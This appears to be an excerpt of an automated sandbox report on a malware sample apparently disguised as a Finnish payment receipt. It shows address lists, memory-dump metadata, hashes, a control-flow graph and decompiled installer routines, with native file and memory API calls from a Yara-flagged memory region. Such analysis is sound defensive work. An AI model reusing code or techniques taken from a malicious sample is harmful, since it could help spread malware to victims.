                                                                                                                      0x00406ef2
                                                                                                                      0x00406ef5
                                                                                                                      0x00406ef7
                                                                                                                      0x00406ef9
                                                                                                                      0x00406ef9
                                                                                                                      0x00406efa
                                                                                                                      0x00406efd
                                                                                                                      0x00406f04
                                                                                                                      0x00406f07
                                                                                                                      0x00406f15
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071eb
                                                                                                                      0x004071eb
                                                                                                                      0x004071ee
                                                                                                                      0x004071f5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071fa
                                                                                                                      0x004071fa
                                                                                                                      0x004071fe
                                                                                                                      0x00407336
                                                                                                                      0x00000000
                                                                                                                      0x00407336
                                                                                                                      0x00407204
                                                                                                                      0x00407207
                                                                                                                      0x0040720a
                                                                                                                      0x0040720e
                                                                                                                      0x00407211
                                                                                                                      0x00407217
                                                                                                                      0x00407219
                                                                                                                      0x00407219
                                                                                                                      0x00407219
                                                                                                                      0x0040721c
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x00407222
                                                                                                                      0x00407222
                                                                                                                      0x00407226
                                                                                                                      0x00407286
                                                                                                                      0x00407289
                                                                                                                      0x0040728e
                                                                                                                      0x0040728f
                                                                                                                      0x00407291
                                                                                                                      0x00407293
                                                                                                                      0x00407296
                                                                                                                      0x00000000
                                                                                                                      0x00407296
                                                                                                                      0x00407228
                                                                                                                      0x0040722e
                                                                                                                      0x00407231
                                                                                                                      0x00407234
                                                                                                                      0x00407237
                                                                                                                      0x0040723a
                                                                                                                      0x0040723d
                                                                                                                      0x00407240
                                                                                                                      0x00407243
                                                                                                                      0x00407246
                                                                                                                      0x00407249
                                                                                                                      0x00407262
                                                                                                                      0x00407265
                                                                                                                      0x00407268
                                                                                                                      0x0040726b
                                                                                                                      0x0040726f
                                                                                                                      0x00407271
                                                                                                                      0x00407271
                                                                                                                      0x00407272
                                                                                                                      0x00407275
                                                                                                                      0x0040724b
                                                                                                                      0x0040724b
                                                                                                                      0x00407253
                                                                                                                      0x00407258
                                                                                                                      0x0040725a
                                                                                                                      0x0040725d
                                                                                                                      0x0040725d
                                                                                                                      0x00407278
                                                                                                                      0x0040727f
                                                                                                                      0x00000000
                                                                                                                      0x00407281
                                                                                                                      0x00000000
                                                                                                                      0x00407281
                                                                                                                      0x00000000
                                                                                                                      0x00406f1d
                                                                                                                      0x00406f20
                                                                                                                      0x00406f56
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407089
                                                                                                                      0x00407089
                                                                                                                      0x0040708c
                                                                                                                      0x0040708e
                                                                                                                      0x00407318
                                                                                                                      0x00000000
                                                                                                                      0x00407318
                                                                                                                      0x00407094
                                                                                                                      0x00407097
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040709d
                                                                                                                      0x004070a1
                                                                                                                      0x004070a4
                                                                                                                      0x004070a4
                                                                                                                      0x004070a4
                                                                                                                      0x00000000
                                                                                                                      0x004070a4
                                                                                                                      0x00406f22
                                                                                                                      0x00406f24
                                                                                                                      0x00406f26
                                                                                                                      0x00406f28
                                                                                                                      0x00406f2b
                                                                                                                      0x00406f2c
                                                                                                                      0x00406f2e
                                                                                                                      0x00406f30
                                                                                                                      0x00406f33
                                                                                                                      0x00406f36
                                                                                                                      0x00406f4c
                                                                                                                      0x00406f51
                                                                                                                      0x00406f89
                                                                                                                      0x00406f89
                                                                                                                      0x00406f8d
                                                                                                                      0x00406fb9
                                                                                                                      0x00406fbb
                                                                                                                      0x00406fc2
                                                                                                                      0x00406fc5
                                                                                                                      0x00406fc8
                                                                                                                      0x00406fc8
                                                                                                                      0x00406fcd
                                                                                                                      0x00406fcd
                                                                                                                      0x00406fcf
                                                                                                                      0x00406fd2
                                                                                                                      0x00406fd9
                                                                                                                      0x00406fdc
                                                                                                                      0x00407009
                                                                                                                      0x00407009
                                                                                                                      0x0040700c
                                                                                                                      0x0040700f
                                                                                                                      0x00407083
                                                                                                                      0x00407083
                                                                                                                      0x00407083
                                                                                                                      0x00000000
                                                                                                                      0x00407083
                                                                                                                      0x00407011
                                                                                                                      0x00407017
                                                                                                                      0x0040701a
                                                                                                                      0x0040701d
                                                                                                                      0x00407020
                                                                                                                      0x00407023
                                                                                                                      0x00407026
                                                                                                                      0x00407029
                                                                                                                      0x0040702c
                                                                                                                      0x0040702f
                                                                                                                      0x00407032
                                                                                                                      0x0040704b
                                                                                                                      0x0040704d
                                                                                                                      0x00407050
                                                                                                                      0x00407051
                                                                                                                      0x00407054
                                                                                                                      0x00407056
                                                                                                                      0x00407059
                                                                                                                      0x0040705b
                                                                                                                      0x0040705d
                                                                                                                      0x00407060
                                                                                                                      0x00407062
                                                                                                                      0x00407065
                                                                                                                      0x00407069
                                                                                                                      0x0040706b
                                                                                                                      0x0040706b
                                                                                                                      0x0040706c
                                                                                                                      0x0040706f
                                                                                                                      0x00407072
                                                                                                                      0x00407034
                                                                                                                      0x00407034
                                                                                                                      0x0040703c
                                                                                                                      0x00407041
                                                                                                                      0x00407043
                                                                                                                      0x00407046
                                                                                                                      0x00407046
                                                                                                                      0x00407075
                                                                                                                      0x0040707c
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00000000
                                                                                                                      0x0040707e
                                                                                                                      0x00000000
                                                                                                                      0x0040707e
                                                                                                                      0x0040707c
                                                                                                                      0x00406f8f
                                                                                                                      0x00406f92
                                                                                                                      0x00406f94
                                                                                                                      0x00406f97
                                                                                                                      0x00406f9a
                                                                                                                      0x00406f9d
                                                                                                                      0x00406f9f
                                                                                                                      0x00406fa2
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fab
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f38
                                                                                                                      0x00406f3b
                                                                                                                      0x00406f3d
                                                                                                                      0x00406f40
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e2a
                                                                                                                      0x00406e2a
                                                                                                                      0x00406e2e
                                                                                                                      0x004072f4
                                                                                                                      0x00000000
                                                                                                                      0x004072f4
                                                                                                                      0x00406e34
                                                                                                                      0x00406e37
                                                                                                                      0x00406e3a
                                                                                                                      0x00406e3d
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e42
                                                                                                                      0x00406e45
                                                                                                                      0x00406e48
                                                                                                                      0x00406e4b
                                                                                                                      0x00406e4e
                                                                                                                      0x00406e51
                                                                                                                      0x00406e52
                                                                                                                      0x00406e54
                                                                                                                      0x00406e54
                                                                                                                      0x00406e54
                                                                                                                      0x00406e57
                                                                                                                      0x00406e5a
                                                                                                                      0x00406e5d
                                                                                                                      0x00406e60
                                                                                                                      0x00406e60
                                                                                                                      0x00406e60
                                                                                                                      0x00406e63
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070ab
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070b1
                                                                                                                      0x004070b4
                                                                                                                      0x004070b7
                                                                                                                      0x004070ba
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bf
                                                                                                                      0x004070c2
                                                                                                                      0x004070c5
                                                                                                                      0x004070c8
                                                                                                                      0x004070cb
                                                                                                                      0x004070ce
                                                                                                                      0x004070cf
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d4
                                                                                                                      0x004070d7
                                                                                                                      0x004070da
                                                                                                                      0x004070dd
                                                                                                                      0x004070e0
                                                                                                                      0x004070e4
                                                                                                                      0x004070e6
                                                                                                                      0x004070e9
                                                                                                                      0x00000000
                                                                                                                      0x004070eb
                                                                                                                      0x00000000
                                                                                                                      0x004070eb
                                                                                                                      0x004070e9
                                                                                                                      0x0040731e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040694d

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                                                                                      • Instruction ID: 906bff5cfe4bf8fc25f5c52b70697fc94252e662920e9b50785524ea690ef068
                                                                                                                      • Opcode Fuzzy Hash: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                                                                                      • Instruction Fuzzy Hash: EBF17870D04229CBDF18CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E004066F3(WCHAR* _a4) {
                                                                                                                      				void* _t2;
                                                                                                                      
                                                                                                                      				_t2 = FindFirstFileW(_a4, 0x426778); // executed
                                                                                                                      				if(_t2 == 0xffffffff) {
                                                                                                                      					return 0;
                                                                                                                      				}
                                                                                                                      				FindClose(_t2);
                                                                                                                      				return 0x426778;
                                                                                                                      			}




                                                                                                                      0x004066fe
                                                                                                                      0x00406707
                                                                                                                      0x00000000
                                                                                                                      0x00406714
                                                                                                                      0x0040670a
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405DD2,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75832EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75832EE0), ref: 004066FE
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040670A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                      • String ID: xgB
                                                                                                                      • API String ID: 2295610775-399326502
                                                                                                                      • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                      • Instruction ID: 551d457f2096baf6d1028c2489454c6ec1272a262abf728b5c7319079dd029a3
                                                                                                                      • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                      • Instruction Fuzzy Hash: DBD012315090209BC201173CBE4C85B7A989F953397128B37B466F71E0C7348C638AE8
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnableShow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1136574915-0
                                                                                                                      • Opcode ID: ea88ffc744e15e287a06a6fdecaece667b947ab9c8904983f571e0aac4c2a1a0
                                                                                                                      • Instruction ID: 353457a250eeab47012712e359045a90ae935b3a48e85cb5936bf3a8ff6902a1
                                                                                                                      • Opcode Fuzzy Hash: ea88ffc744e15e287a06a6fdecaece667b947ab9c8904983f571e0aac4c2a1a0
                                                                                                                      • Instruction Fuzzy Hash: 40E09232E08200CFD724DBA5AA4946D77B0EB84354720407FE112F11D1DA784881CF6D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • NtCreateFile.NTDLL(00000060,00000005,00000000,091D17FC,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,091D17FC,00000000,00000005,00000060,00000000,00000000), ref: 091D6ACD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: de27f103248dd3cce05e78cfd2cfb3ff6882f0730fdd2933290fa7802eff9753
                                                                                                                      • Instruction ID: 45c73c0954b996d75dc66ab43c926f3e79c662ff920be1f9401836608e7fe0ad
                                                                                                                      • Opcode Fuzzy Hash: de27f103248dd3cce05e78cfd2cfb3ff6882f0730fdd2933290fa7802eff9753
                                                                                                                      • Instruction Fuzzy Hash: D101B2B2211208AFCB44DF98DC85EEB77EABF8C754F158248FA0D97641D630E851CBA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • NtCreateFile.NTDLL(00000060,00000005,00000000,091D17FC,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,091D17FC,00000000,00000005,00000060,00000000,00000000), ref: 091D6ACD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: e0dd4601fa567a4ece3450075541aaf07d6562baefc0b0883b59eb6e2cd73a51
                                                                                                                      • Instruction ID: b0c6b5ec8142b25c7c2840a4d1ba79d01547dcf0915d798d3b8f609ab602717f
                                                                                                                      • Opcode Fuzzy Hash: e0dd4601fa567a4ece3450075541aaf07d6562baefc0b0883b59eb6e2cd73a51
                                                                                                                      • Instruction Fuzzy Hash: 4AF0BDB2205208ABCB08DF88DC84EEB77EDAF8C754F058208BA0D97240D630E851CBA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • NtReadFile.NTDLL(091D19C0,091CCE8B,FFFFFFFF,091D14B0,00000206,?,091D19C0,00000206,091D14B0,FFFFFFFF,091CCE8B,091D19C0,00000206,00000000), ref: 091D6B75
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      • Opcode ID: adc9d58e0dd8f11d357056f81d7982816f1713366143eb9f779a083cbeb95e97
                                                                                                                      • Instruction ID: 3d85b027e3969c751ca7f0a06ae8733d4d40c9557fa19e953ae261b29cf6a244
                                                                                                                      • Opcode Fuzzy Hash: adc9d58e0dd8f11d357056f81d7982816f1713366143eb9f779a083cbeb95e97
                                                                                                                      • Instruction Fuzzy Hash: E2F0A4B6200208ABDB14DF99DC84EEB77ADAF8C754F158248BA1D97251D630E851CBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • NtReadVirtualMemory.NTDLL(091C89F3,?,?,091C27AC,091C874E,?,?,091C89F3,00000004,00000000), ref: 091D6C55
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryReadVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2834387570-0
                                                                                                                      • Opcode ID: 54040ab4a847fc78eb609d137900323338be004f2b63f3bbe3e31f1fa5ec3454
                                                                                                                      • Instruction ID: e4b2d12be576f7b555bd5f68186bd8f58ed3d757aa061da92433653ef9a6be13
                                                                                                                      • Opcode Fuzzy Hash: 54040ab4a847fc78eb609d137900323338be004f2b63f3bbe3e31f1fa5ec3454
                                                                                                                      • Instruction Fuzzy Hash: 42E0C9B6600209ABDB14DF88DC45EA777ADEF88650F008059BA0997241D630F810CBF4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 261 403e6c-403e7e 262 403e84-403e8a 261->262 263 403fbf-403fce 261->263 262->263 266 403e90-403e99 262->266 264 403fd0-404018 GetDlgItem * 2 call 404345 SetClassLongW call 40140b 263->264 265 40401d-404032 263->265 264->265 270 404072-404077 call 404391 265->270 271 404034-404037 265->271 267 403e9b-403ea8 SetWindowPos 266->267 268 403eae-403eb1 266->268 267->268 272 403eb3-403ec5 ShowWindow 268->272 273 403ecb-403ed1 268->273 283 40407c-404097 270->283 275 404039-404044 call 401389 271->275 276 40406a-40406c 271->276 272->273 278 403ed3-403ee8 DestroyWindow 273->278 279 403eed-403ef0 273->279 275->276 298 404046-404065 SendMessageW 275->298 276->270 282 404312 276->282 286 4042ef-4042f5 278->286 289 403ef2-403efe SetWindowLongW 279->289 290 403f03-403f09 279->290 288 404314-40431b 282->288 284 4040a0-4040a6 283->284 285 404099-40409b call 40140b 283->285 294 4042d0-4042e9 DestroyWindow EndDialog 284->294 295 4040ac-4040b7 284->295 285->284 286->282 293 4042f7-4042fd 286->293 289->288 296 403fac-403fba call 4043ac 290->296 297 403f0f-403f20 GetDlgItem 290->297 293->282 299 4042ff-404308 ShowWindow 293->299 294->286 295->294 300 4040bd-40410a call 4063d2 call 404345 * 3 GetDlgItem 295->300 296->288 301 403f22-403f39 SendMessageW IsWindowEnabled 297->301 302 403f3f-403f42 297->302 298->288 299->282 331 404114-404150 ShowWindow KiUserCallbackDispatcher call 404367 EnableWindow 300->331 332 40410c-404111 300->332 301->282 301->302 305 403f44-403f45 302->305 306 403f47-403f4a 302->306 309 403f75-403f7a call 40431e 305->309 310 403f58-403f5d 306->310 311 403f4c-403f52 306->311 309->296 312 403f93-403fa6 SendMessageW 310->312 313 403f5f-403f65 310->313 311->312 316 403f54-403f56 311->316 312->296 317 403f67-403f6d call 40140b 313->317 318 403f7c-403f85 call 40140b 313->318 316->309 327 403f73 317->327 318->296 328 403f87-403f91 318->328 327->309 328->327 335 404152-404153 331->335 336 404155 331->336 332->331 337 404157-404185 GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404187-404198 SendMessageW 337->338 339 40419a 337->339 340 4041a0-4041df call 40437a call 403e4d call 4063b0 lstrlenW call 4063d2 SetWindowTextW call 401389 338->340 339->340 340->283 351 4041e5-4041e7 340->351 351->283 352 4041ed-4041f1 351->352 353 404210-404224 DestroyWindow 352->353 354 4041f3-4041f9 352->354 353->286 356 40422a-404257 CreateDialogParamW 353->356 354->282 355 4041ff-404205 354->355 355->283 357 40420b 355->357 356->286 358 40425d-4042b4 call 404345 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 4042b6-4042ce ShowWindow call 404391 358->363 363->286
                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E00403E6C(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                                                      				struct HWND__* _v32;
                                                                                                                      				void* _v84;
                                                                                                                      				void* _v88;
                                                                                                                      				void* __ebx;
                                                                                                                      				void* __edi;
                                                                                                                      				void* __esi;
                                                                                                                      				signed int _t37;
                                                                                                                      				signed int _t39;
                                                                                                                      				signed int _t41;
                                                                                                                      				struct HWND__* _t51;
                                                                                                                      				signed int _t70;
                                                                                                                      				struct HWND__* _t76;
                                                                                                                      				signed int _t89;
                                                                                                                      				struct HWND__* _t94;
                                                                                                                      				signed int _t102;
                                                                                                                      				int _t106;
                                                                                                                      				signed int _t118;
                                                                                                                      				signed int _t119;
                                                                                                                      				int _t120;
                                                                                                                      				signed int _t125;
                                                                                                                      				struct HWND__* _t128;
                                                                                                                      				struct HWND__* _t129;
                                                                                                                      				int _t130;
                                                                                                                      				long _t133;
                                                                                                                      				int _t135;
                                                                                                                      				int _t136;
                                                                                                                      				void* _t137;
                                                                                                                      				void* _t144;
                                                                                                                      
                                                                                                                      				_t118 = _a8;
                                                                                                                      				if(_t118 == 0x110 || _t118 == 0x408) {
                                                                                                                      					_t37 = _a12;
                                                                                                                      					_t128 = _a4;
                                                                                                                      					__eflags = _t118 - 0x110;
                                                                                                                      					 *0x423710 = _t37;
                                                                                                                      					if(_t118 == 0x110) {
                                                                                                                      						 *0x42a248 = _t128;
                                                                                                                      						 *0x423724 = GetDlgItem(_t128, "true");
                                                                                                                      						_t94 = GetDlgItem(_t128, 2);
                                                                                                                      						_push(0xffffffff);
                                                                                                                      						_push(0x1c);
                                                                                                                      						 *0x4216f0 = _t94;
                                                                                                                      						E00404345(_t128);
                                                                                                                      						SetClassLongW(_t128, 0xfffffff2,  *0x429228);
                                                                                                                      						 *0x42920c = E0040140B(4);
                                                                                                                      						_t37 = 1;
                                                                                                                      						__eflags = 1;
                                                                                                                      						 *0x423710 = 1;
                                                                                                                      					}
                                                                                                                      					_t125 =  *0x40a39c; // 0x0
                                                                                                                      					_t136 = 0;
                                                                                                                      					_t133 = (_t125 << 6) +  *0x42a280;
                                                                                                                      					__eflags = _t125;
                                                                                                                      					if(_t125 < 0) {
                                                                                                                      						L34:
                                                                                                                      						E00404391(0x40b);
                                                                                                                      						while(1) {
                                                                                                                      							_t39 =  *0x423710;
                                                                                                                      							 *0x40a39c =  *0x40a39c + _t39;
                                                                                                                      							_t133 = _t133 + (_t39 << 6);
                                                                                                                      							_t41 =  *0x40a39c; // 0x0
                                                                                                                      							__eflags = _t41 -  *0x42a284;
                                                                                                                      							if(_t41 ==  *0x42a284) {
                                                                                                                      								E0040140B("true");
                                                                                                                      							}
                                                                                                                      							__eflags =  *0x42920c - _t136;
                                                                                                                      							if( *0x42920c != _t136) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                                                                                                      							if(__eflags >= 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							_t119 =  *(_t133 + 0x14);
                                                                                                                      							E004063D2(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                                                      							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                                                      							_push(0xfffffc19);
                                                                                                                      							E00404345(_t128);
                                                                                                                      							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                                                      							_push(0xfffffc1b);
                                                                                                                      							E00404345(_t128);
                                                                                                                      							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                                                      							_push(0xfffffc1a);
                                                                                                                      							E00404345(_t128);
                                                                                                                      							_t51 = GetDlgItem(_t128, 3);
                                                                                                                      							__eflags =  *0x42a2ec - _t136;
                                                                                                                      							_v32 = _t51;
                                                                                                                      							if( *0x42a2ec != _t136) {
                                                                                                                      								_t119 = _t119 & 0x0000fefd | 0x00000004;
                                                                                                                      								__eflags = _t119;
                                                                                                                      							}
                                                                                                                      							ShowWindow(_t51, _t119 & 0x00000008); // executed
                                                                                                                      							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
                                                                                                                      							E00404367(_t119 & 0x00000002);
                                                                                                                      							_t120 = _t119 & 0x00000004;
                                                                                                                      							EnableWindow( *0x4216f0, _t120);
                                                                                                                      							__eflags = _t120 - _t136;
                                                                                                                      							if(_t120 == _t136) {
                                                                                                                      								_push("true");
                                                                                                                      							} else {
                                                                                                                      								_push(_t136);
                                                                                                                      							}
                                                                                                                      							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
                                                                                                                      							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, "true");
